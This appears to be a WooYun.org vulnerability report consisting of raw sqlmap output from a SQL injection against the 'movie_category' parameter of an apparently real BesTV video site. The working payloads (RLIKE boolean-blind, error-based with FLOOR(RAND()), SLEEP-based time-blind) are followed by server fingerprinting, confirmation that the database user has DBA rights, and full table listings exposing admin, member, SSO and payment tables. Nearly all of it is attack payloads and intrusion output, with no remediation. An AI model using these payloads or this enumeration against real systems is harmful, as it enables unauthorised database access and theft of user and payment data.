WooYun.org

---
Parameter: movie_category (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: a=lists&c=index&catid=27&channel=1&m=content&modelid=11&movie_category=1 RLIKE (SELECT (CASE WHEN (3318=3318) THEN 1 ELSE 0x28 END))&movie_special=1&movie_type=4&order=id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: a=lists&c=index&catid=27&channel=1&m=content&modelid=11&movie_category=1 AND (SELECT 2004 FROM(SELECT COUNT(*),CONCAT(0x71627a6271,(SELECT (ELT(2004=2004,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&movie_special=1&movie_type=4&order=id
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: a=lists&c=index&catid=27&channel=1&m=content&modelid=11&movie_category=1 AND (SELECT * FROM (SELECT(SLEEP(5)))dgbG)&movie_special=1&movie_type=4&order=id
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0
current user:    'bestvMan@%'
current user is DBA:    True
available databases [8]:
[*] BesTV
[*] information_schema
[*] mysql
[*] ottcms
[*] siteserver
[*] test
[*] wei7
[*] xbox
Database: BesTV
[13 tables]
+------------------+
| Appstore         |
| BesTV_User       |
| WeiXin_File      |
| WeiXin_FileCount |
| WeiXin_Group     |
| WeiXin_GroupUser |
| WeiXin_KeyWord   |
| WeiXin_Menu      |
| WeiXin_Message   |
| WeiXin_News      |
| WeiXin_Reply     |
| WeiXin_Users     |
| visitorMessage   |
+------------------+
Database: ottcms
[154 tables]
+-----------------------+
| test2                 |
| v9_activte            |
| v9_activte_data       |
| v9_admin              |
| v9_admin_panel        |
| v9_admin_role         |
| v9_admin_role_priv    |
| v9_app                |
| v9_app_data           |
| v9_attachment         |
| v9_attachment_index   |
| v9_badword            |
| v9_bestv_user         |
| v9_block              |
| v9_block_history      |
| v9_block_priv         |
| v9_cache              |
| v9_cart               |
| v9_cart_now           |
| v9_category           |
| v9_category_priv      |
| v9_client             |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node    |
| v9_collection_program |
| v9_comment            |
| v9_comment_check      |
| v9_comment_data_1     |
| v9_comment_setting    |
| v9_comment_table      |
| v9_consignee          |
| v9_content_check      |
| v9_copyfrom           |
| v9_datacall           |
| v9_dbsource           |
| v9_dianping           |
| v9_dianping_data      |
| v9_dianping_type      |
| v9_download           |
| v9_download_data      |
| v9_downservers        |
| v9_extend_setting     |
| v9_favorite           |
| v9_form_askJob        |
| v9_hits               |
| v9_hotshow            |
| v9_hotshow_data       |
| v9_ipbanned           |
| v9_job                |
| v9_job_data           |
| v9_keylink            |
| v9_keyword            |
| v9_keyword_data       |
| v9_link               |
| v9_linkage            |
| v9_live               |
| v9_live_data          |
| v9_live_store         |
| v9_log                |
| v9_medianum           |
| v9_member             |
| v9_member_detail      |
| v9_member_group       |
| v9_member_menu        |
| v9_member_verify      |
| v9_member_vip         |
| v9_menu               |
| v9_message            |
| v9_message_data       |
| v9_message_group      |
| v9_model              |
| v9_model_field        |
| v9_module             |
| v9_news               |
| v9_news_data          |
| v9_order              |
| v9_order_back         |
| v9_order_log          |
| v9_ottvideo           |
| v9_ottvideo_data      |
| v9_page               |
| v9_pay_account        |
| v9_pay_payment        |
| v9_pay_spend          |
| v9_picture            |
| v9_picture_data       |
| v9_player             |
| v9_position           |
| v9_position_data      |
| v9_poster             |
| v9_poster_201305      |
| v9_poster_201306      |
| v9_poster_201307      |
| v9_poster_201308      |
| v9_poster_201309      |
| v9_poster_201310      |
| v9_poster_201311      |
| v9_poster_201401      |
| v9_poster_201402      |
| v9_poster_201403      |
| v9_poster_201404      |
| v9_poster_201405      |
| v9_poster_201406      |
| v9_poster_201407      |
| v9_poster_201408      |
| v9_poster_201409      |
| v9_poster_201410      |
| v9_poster_201411      |
| v9_poster_201412      |
| v9_poster_201501      |
| v9_poster_201502      |
| v9_poster_201503      |
| v9_poster_201504      |
| v9_poster_201505      |
| v9_poster_201506      |
| v9_poster_space       |
| v9_product            |
| v9_product_data       |
| v9_productbuy         |
| v9_queue              |
| v9_release_point      |
| v9_schedule           |
| v9_search             |
| v9_search_keyword     |
| v9_session            |
| v9_shuang11           |
| v9_shuang11_user      |
| v9_site               |
| v9_special            |
| v9_special_c_data     |
| v9_special_content    |
| v9_sphinx_counter     |
| v9_sso_admin          |
| v9_sso_applications   |
| v9_sso_members        |
| v9_sso_messagequeue   |
| v9_sso_session        |
| v9_sso_settings       |
| v9_tag                |
| v9_template_bak       |
| v9_times              |
| v9_type               |
| v9_urlrule            |
| v9_video              |
| v9_video_content      |
| v9_video_data         |
| v9_video_service      |
| v9_video_store        |
| v9_video_temp         |
| v9_vote_data          |
| v9_vote_option        |
| v9_vote_subject       |
| v9_workflow           |
+-----------------------+